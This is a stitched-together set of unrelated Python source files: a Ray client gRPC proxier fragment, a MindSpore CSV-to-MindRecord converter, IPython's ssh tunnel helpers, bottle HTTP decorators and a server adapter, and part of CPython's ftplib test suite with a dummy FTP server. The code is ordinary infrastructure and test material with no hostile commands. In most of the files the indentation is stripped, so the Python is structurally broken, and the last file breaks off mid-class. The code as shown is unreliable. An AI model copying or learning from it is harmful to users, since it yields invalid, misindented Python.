        # We need to retry a few times because the LogClient *may* connect
        # before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.NOT_FOUND)
context.set_details(
"Logstream proxy failed to connect. Channel for client "
f"{client_id} not found."
)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)]
)
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(
connection_str: str,
address: Optional[str],
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None,
runtime_env_agent_port: int = 0,
):
# Initialize internal KV to be used to upload and download working_dir
# before calling ray.init within the RayletServicers.
# NOTE(edoakes): redis_address and redis_password should only be None in
# tests.
if use_gcs_for_bootstrap():
if address is not None:
gcs_cli = GcsClient(address=address)
ray.experimental.internal_kv._initialize_internal_kv(gcs_cli)
else:
if address is not None and redis_password is not None:
gcs_cli = GcsClient.connect_to_gcs_by_redis_address(address, redis_password)
ray.experimental.internal_kv._initialize_internal_kv(gcs_cli)
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS,
)
proxy_manager = ProxyManager(
address,
session_dir=session_dir,
redis_password=redis_password,
runtime_env_agent_port=runtime_env_agent_port,
)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(logs_servicer, server)
add_port_to_grpc_server(server, connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
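
# For orientation, the bare gRPC server lifecycle that serve_proxier follows;
# servicer registration is elided and the port below is an illustrative
# assumption, not a value used by the proxier.
def _minimal_grpc_server_sketch():
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    # ... add_*Servicer_to_server(servicer, server) calls go here ...
    server.add_insecure_port("127.0.0.1:50051")
    server.start()
    return server  # callers keep the handle and later call server.stop(None)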
|
csv_to_mr.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Csv format convert tool for MindRecord.
"""
from importlib import import_module
import os
from mindspore import log as logger
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
try:
pd = import_module("pandas")
except ModuleNotFoundError:
pd = None
__all__ = ['CsvToMR']
class CsvToMR:
"""
A class to transform from csv to MindRecord.
Args:
source (str): the file path of csv.
destination (str): the MindRecord file path to transform into.
columns_list(list[str], optional): A list of columns to be read(default=None).
partition_number (int, optional): partition size (default=1).
Raises:
        ValueError: If `source`, `destination` or `partition_number` is invalid.
RuntimeError: If `columns_list` is invalid.
"""
def __init__(self, source, destination, columns_list=None, partition_number=1):
if not pd:
raise Exception("Module pandas is not found, please use pip install it.")
if isinstance(source, str):
check_filename(source)
self.source = source
else:
raise ValueError("The parameter source must be str.")
self.check_columns(columns_list, "columns_list")
self.columns_list = columns_list
if isinstance(destination, str):
check_filename(destination)
self.destination = destination
else:
raise ValueError("The parameter destination must be str.")
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
@staticmethod
def check_columns(columns, columns_name):
if not columns:
return
if isinstance(columns, list):
for col in columns:
if not isinstance(col, str):
raise ValueError("The parameter {} must be list of str.".format(columns_name))
else:
raise ValueError("The parameter {} must be list of str.".format(columns_name))
def _get_schema(self, df):
"""
Construct schema from df columns
"""
if self.columns_list:
for col in self.columns_list:
if col not in df.columns:
raise RuntimeError("The parameter columns_list is illegal, column {} does not exist.".format(col))
else:
self.columns_list = df.columns
schema = {}
for col in self.columns_list:
if str(df[col].dtype) == 'int64':
schema[col] = {"type": "int64"}
elif str(df[col].dtype) == 'float64':
schema[col] = {"type": "float64"}
elif str(df[col].dtype) == 'bool':
schema[col] = {"type": "int32"}
else:
schema[col] = {"type": "string"}
if not schema:
raise RuntimeError("Failed to generate schema from csv file.")
return schema
@staticmethod
def get_row_of_csv(df, columns_list):
"""Get row data from csv file."""
for _, r in df.iterrows():
row = {}
for col in columns_list:
if str(df[col].dtype) == 'bool':
row[col] = int(r[col])
else:
row[col] = r[col]
yield row
def run(self):
"""
Execute transformation from csv to MindRecord.
Returns:
MSRStatus, whether csv is successfully transformed to MindRecord.
"""
if not os.path.exists(self.source):
raise IOError("Csv file {} do not exist.".format(self.source))
pd.set_option('display.max_columns', None)
df = pd.read_csv(self.source)
csv_schema = self._get_schema(df)
logger.info("transformed MindRecord schema is: {}".format(csv_schema))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(csv_schema, "csv_schema")
# add the index
self.writer.add_index(list(self.columns_list))
csv_iter = self.get_row_of_csv(df, self.columns_list)
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
                    data_list.append(next(csv_iter))
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info(
"transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
return ret
def transform(self):
"""
Encapsulate the run function to exit normally
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
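
# A hedged usage sketch of CsvToMR; the file paths and column names below are
# illustrative assumptions, not values from this module:
#
#     >>> csv_to_mr = CsvToMR("/path/input.csv", "/path/output.mindrecord",
#     ...                     columns_list=["label", "score"])
#     >>> csv_to_mr.transform()
#
# For reference, _get_schema maps pandas dtypes to MindRecord types as:
# int64 -> int64, float64 -> float64, bool -> int32, everything else -> string.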
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import os,sys, atexit
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
    for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
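# Illustrative usage (the ports returned are ephemeral and vary per run):
#
#     >>> lports = select_random_ports(2)
#     >>> len(lports)
#     2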
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
            p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
    keyfile : str; path to private key (identity) file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
                print(tunnel.exitstatus)
                print(tunnel.before)
                print(tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
    keyfile : str; path to private key (identity) file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
        print('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# print ('Now forwarding port %d to %s:%d ...' % (lport, server, rport))
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
        print('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
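
# A hedged usage sketch; the server string, ports, and key path are
# illustrative assumptions, and a reachable ssh server is required:
#
#     >>> ssh_tunnel(12345, 5555, 'user@gateway.example.com',
#     ...            keyfile='~/.ssh/id_rsa', timeout=60)
#
# Afterwards, connections to 127.0.0.1:12345 on this machine are forwarded to
# port 5555 on the tunnel destination (remoteip, as seen from the server).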
|
http_utils.py
|
# coding: utf-8
from __future__ import unicode_literals
from bottle import HTTPError, ServerAdapter
from functools import partial, wraps
from threading import Thread
RETRY_AFTER_HEADER = str('Retry-After')
def abort(code, message=None, headers=None):
"""
Abort a request and send a response with the given code, and optional message and headers.
:raises:
:class:`HTTPError`
"""
raise HTTPError(code, {'message': message}, headers=headers)
def retry_after(delay, code=429):
"""
Abort a request and send a response, including a Retry-After header informing the client when a retry of
the request will be accepted.
"""
abort(code, headers={RETRY_AFTER_HEADER: delay})
def authorize(method):
"""Decorator for a method that requires authorization. Unauthorized requests will be aborted with a 401."""
@wraps(method)
def authorized_method(self, *args, **kwargs):
skip_auth = kwargs.pop('skip_auth', False)
if not skip_auth:
self.check_authorization_header()
return method(self, *args, **kwargs)
return authorized_method
def rate_limit(method):
"""Decorator for a method that requires rate limiting. Too many requests will be aborted with a 429."""
@wraps(method)
def limited_method(self, *args, **kwargs):
skip_limit = kwargs.pop('skip_limit', False)
if not skip_limit:
self.check_rate_limits()
return method(self, *args, **kwargs)
return limited_method
def _route(verb, app, route):
"""Helper decorator to apply methods to routes."""
def routed_method(method):
setattr(method, 'verb', verb)
setattr(method, 'app', app)
setattr(method, 'route', route)
return method
return routed_method
def log_request(method):
"""Decorator for a method to add its request to the request log."""
@wraps(method)
def logged_method(self, *args, **kwargs):
skip_log = kwargs.pop('skip_log', False)
if not skip_log:
self.append_to_request_log()
return method(self, *args, **kwargs)
return logged_method
GET = partial(_route, 'GET')
POST = partial(_route, 'POST')
PUT = partial(_route, 'PUT')
DELETE = partial(_route, 'DELETE')
OPTIONS = partial(_route, 'OPTIONS')
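# Illustrative use of the verb helpers above: they only attach metadata to a
# method, which a dispatcher elsewhere is expected to read back. The handler
# class and route are assumptions for the example:
#
#     class StatusHandler(object):
#         @GET('my_app', '/status')
#         def status(self):
#             return {'ok': True}
#
#     # StatusHandler.status.verb == 'GET'
#     # StatusHandler.status.app == 'my_app'
#     # StatusHandler.status.route == '/status'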
class StoppableWSGIRefServer(ServerAdapter):
"""
Subclass of built-in Bottle server adapter that allows the server to be stopped.
This is important for testing, since we don't want to "serve forever".
"""
def __init__(self, host='127.0.0.1', port=8080, **options):
super(StoppableWSGIRefServer, self).__init__(host, port, **options)
self.srv = None
self._thread = None
def run(self, app):
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
class FixedHandler(WSGIRequestHandler):
def address_string(self):
return self.client_address[0]
            parent = self  # the enclosing server adapter; handlers read parent.quiet
def log_request(self, *args, **kw):
if not self.parent.quiet:
return WSGIRequestHandler.log_request(self, *args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
self.srv = make_server(self.host, self.port, app, server_cls, handler_cls)
thread = Thread(target=self.srv.serve_forever)
thread.daemon = True
thread.start()
self._thread = thread
self.srv.wait = self.wait
return self.srv
def wait(self):
self.srv.server_close()
self._thread.join()
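
# A hedged usage sketch, assuming a bottle application object `app` exists:
#
#     server = StoppableWSGIRefServer(host='127.0.0.1', port=8080)
#     srv = server.run(app)   # serves on a daemon thread, returns immediately
#     ...                     # exercise the endpoints under test
#     srv.wait()              # close the listening socket and join the thread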
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import threading
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import threading_helper
from test.support import socket_helper
from test.support import warnings_helper
from test.support.socket_helper import HOST, HOSTv6
TIMEOUT = support.LOOPBACK_TIMEOUT
DEFAULT_ENCODING = 'utf-8'
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000 + 'non-ascii char \xAE\r\n'
LIST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
NLST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n"
"type=dir;perm=cpmel;unique==SGP1; dir \xAE non-ascii char\r\n"
"type=file;perm=r;unique==SGP2; file \xAE non-ascii char\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
self.encoding = baseclass.encoding
def handle_read(self):
new_data = self.recv(1024).decode(self.encoding, 'replace')
self.baseclass.last_received_data += new_data
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode(self.encoding))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
self.encoding = encoding
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode(self.encoding)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode(self.encoding) + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0)) as sock:
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
            ip = ip.replace('.', ','); p1 = port // 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0),
family=socket.AF_INET6) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET, encoding=DEFAULT_ENCODING):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
self.encoding = encoding
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn, encoding=self.encoding)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
            if getattr(self, '_ccc', False) is False:
                super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
DummyFTPHandler.__init__(self, conn, encoding=encoding)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
